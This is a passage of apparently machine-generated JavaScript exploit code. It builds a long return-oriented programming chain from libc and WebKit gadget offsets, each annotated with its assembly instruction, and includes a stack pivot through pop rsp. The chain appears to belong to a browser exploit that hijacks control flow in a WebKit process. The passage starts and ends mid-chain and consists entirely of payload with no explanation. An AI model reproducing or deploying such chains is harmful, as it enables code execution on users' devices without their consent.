set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+519888, //L11393
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L11393:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L11395:
db([4294967284, 4294967295]); // -0xc
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+3488438, //mov [rax], ecx
libc_base+764760, //pop rsi
ropchain+519968, //L11397
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L11397:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+520104, //L11400
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+520088, //L11399
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L11398:
db([32, 0]); // 0x20
set_gadget(webkit_base+3236123,); //pop r9
//L11399:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L11400:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+520192, //L11401
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+520224, //L11403
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L11401:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L11402:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L11403:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+346125, //setne al
libc_base+226597, //movzx eax, al
libc_base+764760, //pop rsi
ropchain+520296, //L11404
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L11404:
db([0, 0]); // 0x0
//L11372:
set_gadgets([
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+520424, //L11407
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+520440, //L11408
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+520408, //L11406
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L11406:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L11407:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L11408:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+520584, //L11411
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+520600, //L11412
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+520552, //L11409
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L11409:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L11410:
db([0, 0]); // 0x0
set_gadget(libc_base+763368,); //pop rcx
//L11411:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L11412:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+346125, //setne al
libc_base+226597, //movzx eax, al
libc_base+764760, //pop rsi
ropchain+520672, //L11413
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L11413:
db([0, 0]); // 0x0
//L11337:
set_gadgets([
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+520800, //L11416
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+520816, //L11417
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+520784, //L11415
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L11415:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L11416:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L11417:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+520928, //L11419
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+520976, //L11422
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+520944, //L11420
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L11419:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L11420:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L11421:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L11422:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+226597, //movzx eax, al
webkit_base+5507491, //shl rax, 3
libc_base+764760, //pop rsi
ropchain+521088, //L11423+8
libc_base+501454, //add rax, rsi
libc_base+501611, //mov rax, [rax]
libc_base+764760, //pop rsi
ropchain+521080, //L11423
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+782311 //pop rsp
]);
//L11423:
db([0, 0]); // 0x0
set_gadgets([
ropchain+521104, //L11423+24
ropchain+524848, //L11418
libc_base+764760, //pop rsi
ropchain+521144, //L11424
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L11424:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L11426:
db([32, 0]); // 0x20
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+521264, //L11429
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+521248, //L11427
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L11427:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L11429:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+521408, //L11432
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+521376, //L11430
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+521392, //L11431
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L11430:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L11431:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L11432:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+521488, //L11433
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L11433:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L11435:
db([4294967272, 4294967295]); // -0x18
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+521608, //L11438
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+521592, //L11436
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L11436:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L11438:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+521752, //L11441
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+521720, //L11439
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+521736, //L11440
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L11439:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L11440:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L11441:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+521840, //L11443
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+764760 //pop rsi
]);
//L11442:
db([1, 0]); // 0x1
set_gadget(libc_base+759608,); //pop rax
//L11443:
db([0, 0]); // 0x0
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+521896, //L11444
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L11444:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L11446:
db([4294967272, 4294967295]); // -0x18
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+20307877, //mov [rax], rcx
libc_base+764760, //pop rsi
ropchain+521976, //L11448
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L11448:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+522088, //L11449
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L11449:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L11451:
db([24, 0]); // 0x18
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+522208, //L11454
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+522192, //L11452
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L11452:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L11454:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+522352, //L11457
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+522320, //L11455
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+522336, //L11456
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L11455:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L11456:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L11457:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+522432, //L11458
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L11458:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L11460:
db([4294967208, 4294967295]); // -0x58
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+522552, //L11463
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+522536, //L11461
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L11461:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L11463:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+522696, //L11466
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+522664, //L11464
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+522680, //L11465
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L11464:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L11465:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L11466:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+522784, //L11468
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+764760 //pop rsi
]);
//L11467:
db([1, 0]); // 0x1
set_gadget(libc_base+759608,); //pop rax
//L11468:
db([0, 0]); // 0x0
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+522840, //L11469
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L11469:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L11471:
db([4294967208, 4294967295]); // -0x58
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+20307877, //mov [rax], rcx
libc_base+764760, //pop rsi
ropchain+522920, //L11473
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L11473:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+523072, //L11475
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+523088, //L11476
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+523056, //L11474
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L11474:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L11475:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L11476:
db([0, 0]); // 0x0
set_gadgets([
libc_base+223440, //mov al, [rdi]
libc_base+764760, //pop rsi
ropchain+523248, //L11480
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+523216, //L11478
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+523232, //L11479
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L11477:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L11478:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L11479:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L11480:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+523304, //L11482
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L11482:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+523432, //L11484
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+523448, //L11485
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+523416, //L11483
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L11483:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L11484:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L11485:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+523608, //L11489
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+523576, //L11487
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+523592, //L11488
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L11486:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L11487:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L11488:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L11489:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+523664, //L11491
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L11491:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+523792, //L11493
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+523808, //L11494
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+523776, //L11492
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L11492:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L11493:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L11494:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+523968, //L11498
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+523936, //L11496
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+523952, //L11497
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L11495:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L11496:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L11497:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L11498:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+524024, //L11500
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L11500:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+524152, //L11502
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+524168, //L11503
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+524136, //L11501
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L11501:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L11502:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L11503:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+524248, //L11504
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+524264, //L11505
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L11504:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L11505:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+524360, //L11507
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+524344, //L11506
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L11506:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L11507:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+524440, //L11508
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L11508:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L11510:
db([16, 0]); // 0x10
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+524560, //L11513
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+524544, //L11511
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L11511:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L11513:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+524640, //L11515
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+524672, //L11517
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L11515:
db([0, 0]); // 0x0
set_gadgets([
libc_base+759608, //pop rax
//L11516:
ropchain+524800, //L11514
libc_base+144605 //pop rdi
]);
//L11517:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+524776, //L11519
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+524792, //L11518
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+759608 //pop rax
]);
//L11519:
db([0, 0]); // 0x0
set_gadget(libc_base+782311,); //pop rsp
//L11518:
db([0, 0]); // 0x0
//L11514:
set_gadgets([
libc_base+853989, //mov rax, rcx
libc_base+764760 //pop rsi
]);
db([4294967264, 4294967295]); // -0x20
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+782311, //pop rsp
ropchain+524864, //L11520
//L11418:
libc_base+782311, //pop rsp
ropchain+524880, //L11521
//L11520:
libc_base+782311, //pop rsp
ropchain+515592, //L11288
//L11521:
libc_base+764760, //pop rsi
ropchain+524920, //L11522
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L11522:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L11524:
db([4294967292, 4294967295]); // -0x4
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+525040, //L11527
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+525024, //L11525
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L11525:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L11527:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+525216, //L11530
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+525232, //L11531
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+525184, //L11528
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+525200, //L11529
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L11528:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L11529:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L11530:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L11531:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+525328, //L11533
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+525312, //L11532
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L11532:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L11533:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L11534:
db([1, 0]); // 0x1
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L11535:
db([1, 0]); // 0x1
set_gadget(libc_base+763368,); //pop rcx
//L11536:
db([1, 0]); // 0x1
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+525528, //L11538
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L11538:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+525584, //L11539
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L11539:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+14664103, //and rax, rcx
libc_base+764760, //pop rsi
ropchain+525720, //L11543
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+525704, //L11542
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L11541:
db([32, 0]); // 0x20
set_gadget(webkit_base+3236123,); //pop r9
//L11542:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L11543:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+525856, //L11546
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+525888, //L11548
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+525840, //L11545
webkit_base+660161, //mov [rsi], rax ; mov al, 1
